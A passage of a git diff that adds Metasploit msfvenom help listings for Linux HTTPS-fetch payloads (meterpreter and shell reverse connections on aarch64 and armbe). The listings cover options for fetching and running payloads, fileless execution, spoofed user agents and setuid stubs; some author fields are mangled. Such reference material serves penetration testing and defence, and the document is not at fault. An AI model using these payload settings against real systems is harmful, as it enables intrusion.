UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-aarch64-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-aarch64-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..c89261c --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-aarch64-meterpreter_reverse_tcp.txt 
@@ -0,0 +1,103 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/aarch64/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/aarch64/meterpreter_reverse_tcp: +========================= + +k@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ItvlIREHl no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + 
MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-aarch64-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-aarch64-shell-reverse_tcp.txt new file mode 100644 index 0000000..6c613ab --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-aarch64-shell-reverse_tcp.txt 
@@ -0,0 +1,98 @@ + + Name: HTTPS Fetch, Linux dup2 Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/https/aarch64/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SHELL /bin/sh yes The shell to execute. + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME pLWiexkO no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from an HTTPS server. + dup2 socket in x12, then execve. + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no 
A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-aarch64-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-aarch64-shell_reverse_tcp.txt new file mode 100644 index 0000000..5d4ec4d --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-aarch64-shell_reverse_tcp.txt 
@@ -0,0 +1,86 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/https/aarch64/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 116 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SHELL /bin/sh yes The shell to execute. + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME EVPcQHOnBzNX no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from an HTTPS server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call 
+ PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-armbe-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-https-armbe-meterpreter_reverse_http.txt new file mode 100644 index 0000000..d9edcc9 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-armbe-meterpreter_reverse_http.txt 
@@ -0,0 +1,109 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/armbe/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/armbe/meterpreter_reverse_http: +========================= + +ook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME CDNljsRYiS no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMBE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to 
use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-armbe-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-https-armbe-meterpreter_reverse_https.txt new file mode 100644 index 0000000..045fcea --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-armbe-meterpreter_reverse_https.txt 
@@ -0,0 +1,111 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/armbe/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/armbe/meterpreter_reverse_https: +========================= + +k@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME TKlJrTGPz no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMBE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + 
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-armbe-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-armbe-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..262d3f9 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-armbe-meterpreter_reverse_tcp.txt 
@@ -0,0 +1,103 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/armbe/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/armbe/meterpreter_reverse_tcp: +========================= + +_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME sLWCvEYhx no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMBE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial 